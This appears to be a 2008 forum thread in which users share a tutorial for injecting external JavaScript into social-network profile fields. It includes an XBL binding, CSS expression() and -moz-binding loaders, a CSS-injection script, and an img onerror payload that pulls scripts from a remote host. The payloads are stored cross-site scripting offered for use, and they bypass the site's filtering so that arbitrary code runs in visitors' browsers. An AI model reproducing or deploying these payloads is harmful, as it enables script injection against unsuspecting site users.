[/quote]
Sorry please use English here bro @njlok coz this is international forum
Read the tutorial above. It's also include the newest JS linker Last edited by KaNaLiTnUk (2008-07-18 12:29:46)
Thank you so much for the input
.. good thing you didnt mistaken me for a girl ..
.. well anyways . happy tweaking everyone ..
[b]KaNaLiTnUk[/b]
awesome!
its working !
Do you use loader script? If you use it, remove this part from your loader script code :
[quote]setTimeout("onProfileLoad()",4000);[/quote]
Last edited by KaNaLiTnUk (2008-07-18 13:54:18)
Last edited by areyaa (2008-07-18 14:27:30)
Last edited by kacang`z (2008-07-18 14:33:49)
[b]brother kanalitnuk[/b]
i'm doing what you say myself
here is the codes
#1 [b]xml script[/b]
[quote]<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="ftalk">
<implementation>
<constructor><![CDATA[document.write('<script src=[b]http://h1.ripway.com/marfuad/rya.txt[/b]></script>')]]></constructor>
</implementation>
</binding>
</bindings>[/quote]
#2 [b]css script[/b]
[quote]body {
-moz-binding:url("[b]http://h1.ripway.com/marfuad/jsque.xml[/b]#ftalk");
width:expression(
function load(){
get=document.createElement("script");
get.type="text/javascript";
get.src="[b]http://h1.ripway.com/marfuad/rya.txt[/b]";
document.getElementsByTagName("head")[0].appendChild(get);}
window.onload=load);
}[/quote]
#3 [b]js script[/b]
[quote]var css;
try {
css = document.createElement("link");
}catch(e) {
css = document.createElement("<link>");
}
css.setAttribute("type","text/css");
css.setAttribute("rel","stylesheet");
css.setAttribute("href","[b]http://h1.ripway.com/marfuad/jsinject.css[/b]");
css.setAttribute("media","screen, print");
document.getElementsByTagName("head")[0].appendChild(css);[/quote]
and the last,,this is the codes
[quote]<img src="">" onerror="a=document.createElement('script');a.src='[b]http://h1.ripway.com/marfuad/tawah.js[/b]'
;navBg.appendChild(a)"[/quote]
i put this code in [b]about me[/b] first,,but it doesn't work,,
and the last,,i put the codes in [b]who i want to meet[/b],,but it doesn't work anymore too........
can you tell me what's wrong with it.......??
or i got mistakes in a codes......??
Last edited by areyaa (2008-07-20 09:17:34)
[/quote]
Thanks for the generator oka...very convenient...
[quote=KaNaLiTnUk]For you FTalk'ers who still have multiple loading JS script, try this alternative OK
1. Open your account hosting and create XML script. Example : script.xml
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="ftalk">
<implementation>
<constructor><![CDATA[document.write('<script src=URL OF JS></script>')]]></constructor>
</implementation>
</binding>
</bindings>
URL OF JS = change it with your own JS URL
2. Create a CSS script. Example : script.css
body {
-moz-binding:url("URL OF XML#ftalk");
width:expression(
function load(){
get=document.createElement("script");
get.type="text/javascript";
get.src="URL OF JS";
document.getElementsByTagName("head")[0].appendChild(get);}
window.onload=load);
}
URL OF XML = change with the XML URL from step #1
URL OF JS = change it with your own JS URL
3. Change your CSS script from step #2 to JS extension with CSS injection and name it script.js :
var css;
try {
css = document.createElement("link");
}catch(e) {
css = document.createElement("<link>");
}
css.setAttribute("type","text/css");
css.setAttribute("rel","stylesheet");
css.setAttribute("href","URL CSS");
css.setAttribute("media","screen, print");
document.getElementsByTagName("head")[0].appendChild(css);
URL CSS = change with your own CSS URL from step #2
4. Use this linker and put it in About Me or WIWTM. I try to put it into the Media Box but no response. I prefer insert it into About me section